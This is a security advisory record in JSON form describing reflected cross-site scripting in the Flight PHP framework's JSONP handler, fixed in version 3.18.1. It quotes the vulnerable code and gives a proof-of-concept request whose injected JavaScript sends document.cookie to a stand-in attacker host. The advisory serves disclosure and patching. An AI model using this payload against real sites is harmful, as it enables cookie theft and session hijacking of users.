{"id":"GHSA-fcx8-ph5r-mxr4","summary":"Flight has reflected XSS through an unvalidated JSONP callback in Flight::jsonp()","details":"### Summary\n`Flight::jsonp()` concatenates the `?jsonp=` query parameter directly into an `application/javascript` response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.\n\n### Affected code\n`flight/Engine.php` (≈ lines 1000-1013):\n\n```php\n$callback = $this-\u003erequest()-\u003equery[$param];\n$this-\u003eresponse()\n    -\u003estatus($code)\n    -\u003eheader('Content-Type', 'application/javascript; charset=' . $charset)\n    -\u003ewrite($callback . '(' . $json . ');');\n```\n\nNo regex or identifier validation is performed before the callback is written.\n\n### Proof of concept\nGiven any route that calls `Flight::jsonp($data)`:\n\n```\nGET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//\n```\n\nReproduced response (`Content-Type: application/javascript`):\n\n```\n;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({\"ok\":true,\"msg\":\"hello\"});\n```\n\nWhen the vulnerable endpoint is loaded via `\u003cscript src=\"https://victim.tld/api?jsonp=…\"\u003e` on a page controlled by the attacker, the injected JavaScript executes in the `victim.tld` origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.\n\n### Impact\n- Reflected XSS in any application calling `Flight::jsonp()`.\n- Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages.\n- Exfiltration of authenticated API responses.\n\n### Patch (fixed in `3.18.1`, commit `b8dd23a`)\n`_jsonp()` now validates the callback name against `^[A-Za-z_$][\\w$.]{0,127}$` before emitting it. An empty callback (no `jsonp` parameter) still behaves as before.\n\n### Credit\nDiscovered by **@Rootingg**.","aliases":["CVE-2026-42548"],"modified":"2026-05-06T21:57:55.336006Z","published":"2026-05-06T21:34:15Z","database_specific":{"cwe_ids":["CWE-79"],"github_reviewed":true,"github_reviewed_at":"2026-05-06T21:34:15Z","severity":"HIGH","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/flightphp/core/security/advisories/GHSA-fcx8-ph5r-mxr4"},{"type":"PACKAGE","url":"https://github.com/flightphp/core"}],"affected":[{"package":{"name":"flightphp/core","ecosystem":"Packagist","purl":"pkg:composer/flightphp/core"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.18.1"}]}],"versions":["v1.0","v1.1","v1.1.10","v1.1.5","v1.2","v1.2.13","v1.2.14","v1.2.15","v1.2.17","v1.2.18","v1.2.19","v1.2.20","v1.2.21","v1.2.22","v1.3.0","v1.3.1","v1.3.2","v1.3.3","v1.3.4","v1.3.5","v1.3.7","v1.3.8","v1.3.9","v2.0.0","v2.0.1","v3.0.0","v3.0.1","v3.0.2","v3.1.0","v3.1.1","v3.10.0","v3.10.1","v3.11.0","v3.11.1","v3.12.0","v3.13.0","v3.13.1","v3.14.0","v3.15.0","v3.15.1","v3.15.2","v3.15.3","v3.16.0","v3.16.1","v3.17.0","v3.17.1","v3.17.2","v3.17.3","v3.17.4","v3.18.0","v3.2.0","v3.3.0","v3.4.0","v3.4.1","v3.4.2","v3.5.0","v3.5.2","v3.5.3","v3.6.0","v3.6.1","v3.6.2","v3.7.0","v3.7.1","v3.7.2","v3.8.0","v3.8.1","v3.9.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"}]}